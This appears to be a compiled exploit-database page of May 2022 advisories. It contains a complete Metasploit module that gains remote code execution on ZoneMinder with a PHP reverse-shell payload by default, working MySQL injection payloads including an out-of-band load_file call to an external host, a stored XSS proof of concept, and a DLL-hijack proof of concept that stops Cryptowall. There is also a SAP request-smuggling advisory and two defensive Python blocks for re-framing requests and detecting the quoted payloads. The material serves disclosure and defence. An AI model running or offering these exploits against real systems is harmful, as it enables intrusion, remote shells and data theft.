<pre><code># Exploit Title: ChatBot Application with a Suggestion Feature 1.0 - 'id' Blind SQL Injection<br /># Date: 05/05/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /># Vulnerable Code<br /><br />line 4 in file "/simple_chat_bot/admin/responses/view_response.php"<br /><br />$qry = $conn->query("SELECT * from `response_list` where id = '{$_GET['id']}' ");<br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/simple_chat_bot/admin/?id=0&page=responses/view_response' -p id --level=5 --risk=3 --dbs --random-agent --eta<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=0' AND (SELECT 9931 FROM (SELECT(SLEEP(5)))Etug)-- bfDF&page=responses/view_response<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/0CFFEE266A8F14103158465E2ECDD2C1.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Ransom.Cryptowall<br />Vulnerability: Code Execution<br />Description: Cryptowall looks for and executes DLLs in its current directory. Therefore, we can hijack a vulnerable DLL, execute our own code, and control and terminate the malware pre-encryption. The exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products; the malware's flaw does the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing malware, but this method cannot be, as there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective, you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Cryptowall<br />Type: PE32<br />MD5: 0CFFEE266A8F14103158465E2ECDD2C1<br />Vuln ID: MVID-2022-0584<br />Disclosure: 05/05/2022<br />Video PoC URL: https://www.youtube.com/watch?v=6G06RCqGIT4<br /><br />Exploit/PoC:<br />1) Compile the following C code as "urlmon.dll" 32bit<br />2) Place the DLL in the same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "urlmon.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln - 5/5/2022<br />//Purpose: <br />//gcc -c urlmon.c -m32<br />//gcc -shared -o urlmon.dll urlmon.o -m32<br /><br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br />    switch (reason) {<br />    case DLL_PROCESS_ATTACH:<br />        MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br />        TCHAR buf[MAX_PATH];  // ANSI build (no UNICODE), so TCHAR is char and strcmp applies<br />        if(GetCurrentDirectory(MAX_PATH, buf))  // compare only if the call succeeded<br />            if(strcmp("C:\\Windows\\System32", buf) != 0){<br />                // GetCurrentProcessId() is the Win32 call; getpid() is undeclared without process.h<br />                HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, GetCurrentProcessId());<br />                if (NULL != handle) {<br />                    TerminateProcess(handle, 0);<br />                    CloseHandle(handle);<br />                }<br />            }<br />        break;<br />    }<br />    return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'ZoneMinder Language Settings Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an arbitrary file write in the debug log file option<br /> chained with a path traversal in the language settings that leads to<br /> remote code execution in ZoneMinder surveillance software versions<br /> before 1.36.13 and before 1.37.11<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [ 'krastanoel' ], # Discovery and exploit<br /> 'References' => [<br /> [ 'CVE', '2022-29806' ],<br /> [ 'URL', 'https://krastanoel.com/cve/2022-29806']<br /> ],<br /> 'Platform' => ['php'],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_PHP,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2022-04-27',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'Payload' => 'php/reverse_perl',<br /> 'Encoder' => 'php/base64'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),<br /> OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),<br /> OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'method' => 'GET'<br /> )<br /> return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?<br /> return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200<br /><br /> if res.body =~ /ZoneMinder/<br /> csrf_magic = get_csrf_magic(res)<br /> res = authenticate(csrf_magic) if res.body =~ /ZoneMinder Login/<br /> return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /> else<br /> return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')<br /> end<br /><br /> res.body.match(/v(1.\d+.\d+)/)<br /> version = Regexp.last_match(1)<br /> unless version<br /> return Exploit::CheckCode::Safe('Unable to determine ZoneMinder version')<br /> end<br /><br /> version = Rex::Version.new(version)<br /><br /> return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')<br /><br /> Exploit::CheckCode::Safe("Version Detected: #{version}")<br /> rescue ::Rex::ConnectionError<br /> return Exploit::CheckCode::Unknown('Could not connect to the web service')<br /> end<br /><br /> def exploit<br /> unless datastore['AutoCheck']<br /> cookie_jar.clear<br /> res = authenticate<br /> fail_with(Failure::NoAccess, 'Authentication failed') if res&.body =~ %r{<title>ZM - Login</title>}<br /> end<br /><br /> vprint_status('Leak installation directory path')<br /> random_path = rand_text_alphanumeric(6..15)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true,<br /> 'vars_get' => { 'view' => random_path }<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to leak install path') unless res<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true,<br /> 
'vars_get' => { 'view' => 'options' }<br /> )<br /><br /> csrf_magic = get_csrf_magic(res)<br /> current_lang = res&.get_html_document&.at(<br /> 'select[@name="newConfig[ZM_LANG_DEFAULT]"]<br /> option[@selected="selected"]'<br /> )&.text<br /> fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil? || current_lang.nil?<br /><br /> data = 'view=request&request=log&task=query&limit=10'<br /> data += "&__csrf_magic=#{csrf_magic}" if csrf_magic<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_s,<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res&.body.blank?<br /><br /> res.body.match(/(\{"result":.*})/)<br /> request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access<br /> if request_log.key?(:rows) # Check for latest version key first v1.36.x<br /> request_log_key = 'rows'<br /> elsif request_log.key?(:logs)<br /> request_log_key = 'logs'<br /> else<br /> fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key')<br /> end<br /><br /> request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first<br /> if request_log<br /> path = request_log['File'].split('/')[0..-2].join('/')<br /> vprint_good("Path: #{path}")<br /> else<br /> fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path')<br /> end<br /><br /> fname = "#{rand_text_alphanumeric(6..15)}.php"<br /> traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join<br /> shell = "#{traverse_path}tmp/#{fname}"<br /> data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"<br /> data += "&__csrf_magic=#{csrf_magic}" if csrf_magic<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 
'/index.php'),<br /> 'data' => data.to_s,<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to set LOG_DEBUG_FILE option') if res.nil? || res&.code != 302<br /> vprint_good("Shell: #{shell}")<br /><br /> p = %(<?php #{payload.encoded} ?>)<br /> data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"<br /> data += "&__csrf_magic=#{csrf_magic}" if csrf_magic<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_s,<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to receive a response') unless res<br /><br /> result = JSON.parse(res.body)['result']<br /> fail_with(Failure::UnexpectedReply, 'Failed to write payload') unless result<br /> fail_with(Failure::UnexpectedReply, 'Unable to write payload to LOG_DEBUG_FILE') if result != 'Ok'<br /><br /> # trigger the shell<br /> lang = shell.gsub(/\.php/, '')<br /> data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}"<br /> data += "&__csrf_magic=#{csrf_magic}" if csrf_magic<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_s,<br /> 'keep_cookies' => true<br /> )<br /> fail_with(Failure::UnexpectedReply, 'Unable to trigger the payload') if res.nil? || res&.code != 302<br /><br /> # cleanup<br /> data = Rack::Utils.parse_nested_query(data)<br /> data['newConfig']['ZM_LANG_DEFAULT'] = current_lang<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_query,<br /> 'keep_cookies' => true<br /> )<br /> vprint_warning('Unable to reset language to default') if res.nil? || res&.code != 200<br /><br /> data['tab'] = 'logging'<br /> data['newConfig']['ZM_LOG_DEBUG'] = 0<br /> data['newConfig']['ZM_LOG_DEBUG_FILE'] = ''<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_query,<br /> 'keep_cookies' => true<br /> )<br /> vprint_warning('Unable to reset debug option') if res.nil? || res&.code != 302<br /> rescue ::Rex::ConnectionError<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")<br /> end<br /><br /> private<br /><br /> def get_csrf_magic(res)<br /> return if res.nil?<br /><br /> res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text<br /> end<br /><br /> def authenticate(csrf_magic = nil)<br /> username = datastore['USERNAME']<br /> password = datastore['PASSWORD']<br /> data = "action=login&view=login&username=#{username}&password=#{password}"<br /> data += "&__csrf_magic=#{csrf_magic}" if csrf_magic<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_s,<br /> 'keep_cookies' => true<br /> })<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: PHProjekt (PhpSimplyGest / MyProjects, 1.3.0) - Stored XSS (Cross-Site Scripting)<br /># Date: 2022-05-05<br /># Exploit Author: Andrea Intilangelo<br /># Vendor Homepage: http://www.phprojekt.altervista.org (removed demo was at http://phprojekt.altervista.org/phpsimplygest130)<br /># Software Link: https://github.com/robyfofo/MyProjects (original PhpSimplyGest https://github.com/robyfofo/PhpSimplyGest now merged/renamed into MyProjects)<br /># Version: 1.3<br /># Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.32)<br /># CVE: CVE-2022-27308<br /><br /><br />Description:<br /><br />A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 (and related products from the same vendor, like "MyProjects") allows an attacker to execute arbitrary web scripts or HTML.<br /><br />Persistent JavaScript code injected into the title or description (or content) field while creating a project, todo, timecard, estimate, report or finding is triggered once the page is loaded.<br /><br /><br />Steps to reproduce:<br /><br />Click on Projects and add a project or edit an existing one.<br /><br />Insert the following PoC inside the Title:<br /><br /> <<SCRIPT>alert("XSS here");//\<</SCRIPT><br /><br />Click on 'Send'.<br /><br />If a user visits the website dashboard, as well as the project summary page, the JavaScript code will be rendered.<br /><br /><br />Timeline:<br /><br />2022-01-08: Vulnerability discovered.<br />2022-01-08: Vendor contacted.<br />2022-02-09: No reply, vendor contacted for 2nd time.<br />2022-02-18: Request for CVE reservation.<br />2022-04-27: Assigned CVE number 2022-27308.<br />2022-05-02: No reply, vendor contacted for 3rd time.<br />2022-05-05: Public disclosure.<br /><br /><br />PoC Screenshots:<br /><br />https://imagebin.ca/v/6g5OFET1pyZB<br />https://imagebin.ca/v/6g6qLRC3X5ky<br />https://postimg.cc/qgc19rg0<br /><br /><br /></code></pre>
<pre><code># Onapsis Security Advisory 2022-0001: HTTP Request Smuggling in SAP Web Dispatcher<br /><br />## Impact on Business<br /><br />By injecting an HTTP request as a prefix into a victim's request, a malicious user is able to cause damage in different ways, such as producing a Denial of Service by setting an invalid request as a prefix.<br /><br />It is also possible to inject a valid prefixed request that will include the victim's information from its original request. This can be leveraged to perform malicious requests with the victim's credentials or information, or even to steal user data.<br /><br />HTTP smuggling can also be combined with other vulnerabilities such as an XSS or reflected content (not a vulnerability by itself), by injecting a request to the vulnerable application/web page as a prefix. If the attacker is able to set the prefix of the victim's request and also knows a reflected XSS (it can also work with other content reflection), then the response will include a malicious script that will be executed in the victim's browser.<br /><br />This vulnerability is also useful to perform Web Cache Poisoning. The HTTP caches in the different layers will see valid requests for which the response should be stored (considered static), but the actual request is modified by the attacker's prefix to retrieve another resource, which should not be stored in the cache. As an example, if a user requests an image, the server will probably cache the response, as the resource is static. However, if this request is prefixed by another request which returns sensitive data, such as personal information, then this response will be stored in the cache. Therefore, when the attacker requests the same image, all the victim's personal information will be retrieved.<br /><br />Finally, a critical information disclosure could end up in session hijacking and further attacks. This can be performed by combining HTTP Desynchronization with an Open Redirect, and using the victim's request as the parameter of the redirect location. This would force the victim to send its original request to the attacker, including critical data such as session cookies or query parameters.<br /><br /><br /><br />## Advisory Information<br /><br />- Public Release Date: 04/05/2022<br />- Security Advisory ID: ONAPSIS-2022-0001<br />- Researcher(s): Martin Doyhenard, Yvan Genuer<br /><br /><br />## Vulnerability Information<br /><br />- Vendor: SAP<br />- Affected Components:<br /> - KRNL64NUC 7.22, 7.22EXT, 7.49<br /> - KRNL64UC 7.22, 7.22EXT, 7.49, 7.53<br /> - WEBDISP 7.53, 7.77, 7.81<br /> - KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.83<br /><br /> (Check SAP Note 3080567 for detailed information on affected releases)<br /><br />- Vulnerability Class: CWE-444<br />- CVSS v3 score: 8.9 AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L<br />- Risk Level: High<br />- Assigned CVE: CVE-2021-38162<br />- Vendor patch Information: SAP Security NOTE 3080567<br /><br /><br />## Affected Components Description<br /><br />The SAP Web Dispatcher works as a front-end server between the Internet and one or more backend systems, which consist of one or more SAP NetWeaver ABAP, SAP NetWeaver Java, SAP HANA, or third-party application servers.<br /><br /><br />## Vulnerability Details<br /><br />An HTTP desynchronization vulnerability of the TE.CL type is present in SAP Web Dispatcher if the parameter ```wdisp/HTTP/use_pool_for_new_conn``` is enabled.<br /><br />Pool connection related SAP Notes:<br /><br /> * 2007212 - Tuning SAP Web Dispatcher and ICM for high load<br /><br /> * 953784 - SAP Web Dispatcher Connection Pooling<br /><br />If an attacker sends both the "Content-Length" (CL) and "Transfer-Encoding" (TE) HTTP headers in the same HTTP request, the SAP Web Dispatcher processes the TE header and treats the message body as using chunked encoding. This request is forwarded on to the SAP system's ICM service, which processes only the CL header and determines the body size from it. The rest of the request is left unprocessed, and the ICM will treat it as the start of the next request in the sequence.<br /><br />This can be leveraged to gain control of requests issued by other users, and even to obtain sensitive information by retrieving the victim's requests and responses.<br /><br /><br />## Solution<br /><br />SAP has released SAP Note 3080567, which provides patched versions of the affected components.<br /><br />The patches can be downloaded from https://launchpad.support.sap.com/#/notes/3080567.<br /><br />Onapsis strongly recommends that SAP customers download the related security fixes and apply them to the affected components in order to reduce business risks.<br /><br /><br />## Report Timeline<br /><br /> - 07/12/2021: Onapsis sends details to SAP<br /> - 07/12/2021: SAP provides internal ID<br /> - 08/09/2021: Vulnerability in progress<br /> - 09/14/2021: SAP releases SAP Note fixing the issue.<br /> - 05/04/2022: Advisory Published<br /><br /><br />## References<br /><br />- Onapsis blogpost: https://www.onapsis.com/blog/sap-security-patch-day-september-2021<br />- CVE Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38162<br />- Vendor Patch: https://launchpad.support.sap.com/#/notes/3080567<br /><br /><br />## About Onapsis Research Labs<br /><br />Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combines in-depth knowledge and experience to deliver technical and business context with sound security judgment to the broader information security community.<br /><br />Find all reported vulnerabilities at https://github.com/Onapsis/vulnerability_advisories<br /><br /><br />## About Onapsis, Inc.<br /><br />Onapsis protects the mission-critical applications that run the global economy, from the core to the cloud. The Onapsis Platform uniquely delivers actionable insight, secure change, automated governance and continuous monitoring for critical systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors such as SAP, Oracle, Salesforce and others, while keeping them protected and compliant.<br /><br />For more information, connect with us on Twitter or LinkedIn, or visit us at https://www.onapsis.com.<br /><br /></code></pre>
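The TE.CL desynchronisation described in the Vulnerability Details above can be caught at the front end before the request reaches a Content-Length-only back end. The following Python is an added example, not Onapsis' or SAP's code: it parses a constructed request that carries both framing headers, shows which bytes a Content-Length-only parser would leave unread, and re-frames the request as RFC 7230 section 3.3.3 requires before forwarding. Host name, path and body are constructed placeholders.

```python
"""Front-end framing check for the TE.CL desynchronisation in the advisory.
Models a front end that honours Transfer-Encoding (the Web Dispatcher role)
in front of a back end that honours only Content-Length (the ICM role), and
shows how the front end can refuse or re-frame the ambiguous request.
Added example; host, path and body are constructed placeholders."""
import re

# Constructed request: both framing headers present, body sent chunked.
AMBIGUOUS_REQUEST = (
    b"POST /app/search HTTP/1.1\r\n"
    b"Host: frontend.example.invalid\r\n"
    b"Content-Length: 3\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"c\r\n"            # one chunk of 0xc = 12 bytes
    b"search=shoes\r\n"
    b"0\r\n\r\n"        # last chunk, empty trailer section
)

def split_head(raw: bytes):
    """Return (request line, {lower-cased name: [values]}, body start offset)."""
    idx = raw.find(b"\r\n\r\n")
    if idx < 0:
        raise ValueError("incomplete request head")
    lines = raw[:idx].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, idx + 4

def is_ambiguous(headers) -> bool:
    """Both framing mechanisms present: the CWE-444 precondition."""
    chunked = any("chunked" in v.lower() for v in headers.get("transfer-encoding", []))
    return "content-length" in headers and chunked

def body_end_by_content_length(headers, body_start):
    """Where a CL-only parser (the back end) believes the body ends."""
    values = headers.get("content-length", [])
    if len(set(values)) != 1 or not re.fullmatch(r"[0-9]+", values[0]):
        raise ValueError("missing, conflicting or malformed Content-Length")
    return body_start + int(values[0])

def decode_chunked(raw: bytes, body_start: int):
    """Decode a chunked body as a TE parser (the front end) does.
    Returns (decoded payload, offset just past the terminating empty line)."""
    pos, payload = body_start, bytearray()
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        size = int(raw[pos:eol].split(b";")[0].strip(), 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            break
        if raw[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        payload += raw[pos:pos + size]
        pos += size + 2
    while True:  # optional trailer fields, ended by an empty line
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated trailer section")
        done = eol == pos
        pos = eol + 2
        if done:
            return bytes(payload), pos

def analyse(raw: bytes) -> dict:
    """Report whether both framings are present and which bytes a CL-only back
    end would leave unread and then parse as the start of the next request."""
    request_line, headers, body_start = split_head(raw)
    report = {"request_line": request_line, "ambiguous": is_ambiguous(headers), "unread": b""}
    if report["ambiguous"]:
        _, te_end = decode_chunked(raw, body_start)               # front-end view
        cl_end = body_end_by_content_length(headers, body_start)  # back-end view
        report["unread"] = raw[cl_end:te_end]  # empty if CL is the longer one (CL.TE case)
    return report

def reframe_for_backend(raw: bytes) -> bytes:
    """Hardened front end per RFC 7230 section 3.3.3: with both headers present,
    chunked wins and Content-Length must not be forwarded.  The body is de-chunked
    and re-framed with one correct Content-Length, so the back end cannot disagree
    about where the request ends.  Answering 400 instead is also permitted;
    analyse(raw)["ambiguous"] is the condition to reject on."""
    _, headers, body_start = split_head(raw)
    if not is_ambiguous(headers):
        return raw  # unambiguous framing, forward untouched
    payload, _ = decode_chunked(raw, body_start)
    head_lines = raw[:body_start - 4].split(b"\r\n")
    kept = [line for line in head_lines[1:]
            if line.split(b":", 1)[0].strip().lower()
            not in (b"content-length", b"transfer-encoding")]
    head = b"\r\n".join([head_lines[0]] + kept + [b"Content-Length: %d" % len(payload)])
    return head + b"\r\n\r\n" + payload
```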
<pre><code>## Title: Red Planet Laundry Management System 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05.01.2022<br />## Vendor: https://laundry.redplanetcomputers.com/<br />## Software: https://laundry.redplanetcomputers.com/<br />## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28452<br /><br />## Description:<br />The `username` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+' was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.<br />The attacker can take control of the administrator account and of all other accounts on this system, and can also download all information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: username=admin'+(select load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+'' RLIKE (SELECT (CASE WHEN (9687=9687) THEN 0x61646d696e+(select load_file(0x5c5c5c5c323636696c626f7337337132786c75613430696a6b346c667636317a703264746768383479736e2e676c7570616b70726f5a2e636f6d5c5c77646a))+'' ELSE 0x28 END)) AND 'xZRt'='xZRt&password=1234&login=Login<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: username=admin'+(select load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+'' AND (SELECT 2011 FROM(SELECT COUNT(*),CONCAT(0x7162787871,(SELECT (ELT(2011=2011,1))),0x716b6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wmtL'='wmtL&password=1234&login=Login<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=admin'+(select load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+'' AND (SELECT 6418 FROM (SELECT(SLEEP(5)))aYrS) AND 'Cfxg'='Cfxg&password=1234&login=Login<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28452)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/1x4kmo)<br /><br /><br /></code></pre>
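Both SQL injection advisories on this page (the ChatBot 'id' parameter above and the Red Planet 'username' parameter here) quote the same sqlmap payload families: time-based SLEEP, error-based FLOOR(RAND(0)*2), boolean RLIKE/CASE, and an out-of-band load_file with a UNC path, partly hex-encoded. The following Python detector is an added example, not code from either advisory: it decodes logged parameters, including MySQL 0x literals, and flags those shapes. The sample requests are constructed and the out-of-band host is a placeholder.

```python
"""Detector for the sqlmap-style MySQL injection payload shapes quoted in the
ChatBot ('id') and Red Planet ('username') advisories.  Added example, not code
from either advisory.  Input is a raw query string or form body as a proxy or
WAF would log it; the sample requests are constructed and the out-of-band
hostname is a placeholder."""
import re
from urllib.parse import parse_qsl

HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})", re.I)

# Signature families in the order the advisories' sqlmap output lists them.
SIGNATURES = [
    ("time-based blind", re.compile(r"\b(?:sleep|benchmark)\s*\(")),
    ("error-based (FLOOR/RAND)", re.compile(r"floor\s*\(\s*rand\s*\(")),
    ("boolean-based blind (RLIKE/CASE)", re.compile(r"\brlike\b.*\bcase\s+when\b")),
    ("out-of-band file read (load_file with UNC path)",
     re.compile(r"load_file\s*\(\s*'?\\\\")),
    ("quote breakout", re.compile(r"'\s*(?:and\b|or\b|rlike\b|\+|--)")),
]

# Constructed samples modelled on the quoted payloads (URL-encoded as sent).
# The 0x5c5c5c5c6f6f62... literal decodes to \\\\oob.example.invalid\\wdj.
SAMPLES = {
    "benign": "id=42&page=responses/view_response",
    "apostrophe": "username=O'Brien&password=pa55",
    "time_based": "id=0'+AND+(SELECT+9931+FROM+(SELECT(SLEEP(5)))Etug)--+bfDF"
                  "&page=responses/view_response",
    "boolean": "username=admin'+RLIKE+(SELECT+(CASE+WHEN+(9687%3D9687)+THEN+0x61646d696e"
               "+ELSE+0x28+END))+AND+'xZRt'%3D'xZRt&password=1234&login=Login",
    "error_based": "username=admin'+AND+(SELECT+2011+FROM(SELECT+COUNT(*),CONCAT(0x7162787871,"
                   "(SELECT+(ELT(2011%3D2011,1))),0x716b6b7a71,FLOOR(RAND(0)*2))x+FROM+"
                   "INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)+AND+'wmtL'%3D'wmtL"
                   "&password=1234&login=Login",
    "oob_hex": "username=admin'%2B(select+load_file(0x5c5c5c5c6f6f622e6578616d706c652e"
               "696e76616c69645c5c77646a))%2B'&password=1234&login=Login",
}


def decode_hex_literals(text: str) -> str:
    """Replace MySQL hex literals (0x61646d696e -> admin) so hex-encoded payloads
    match the same signatures as their plain forms."""
    def repl(match):
        digits = match.group(1)
        if len(digits) % 2:
            return match.group(0)  # odd length is not a byte string; leave it
        return bytes.fromhex(digits).decode("latin-1")
    return HEX_LITERAL.sub(repl, text)


def normalize(value: str) -> str:
    """Decode hex literals, strip inline comments, collapse whitespace, lower-case."""
    text = re.sub(r"/\*.*?\*/", " ", decode_hex_literals(value))
    return re.sub(r"\s+", " ", text).lower()


def scan_query_string(query: str) -> dict:
    """Decode a query string or form body and return {parameter: [signature names]}
    for every parameter whose value matches at least one family."""
    findings = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        text = normalize(value)
        hits = [label for label, rx in SIGNATURES if rx.search(text)]
        if hits:
            findings[name] = hits
    return findings


def scan_samples(samples: dict) -> dict:
    """Scan a batch of logged requests and keep only those with findings."""
    flagged = {}
    for tag, query in samples.items():
        hits = scan_query_string(query)
        if hits:
            flagged[tag] = hits
    return flagged
```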
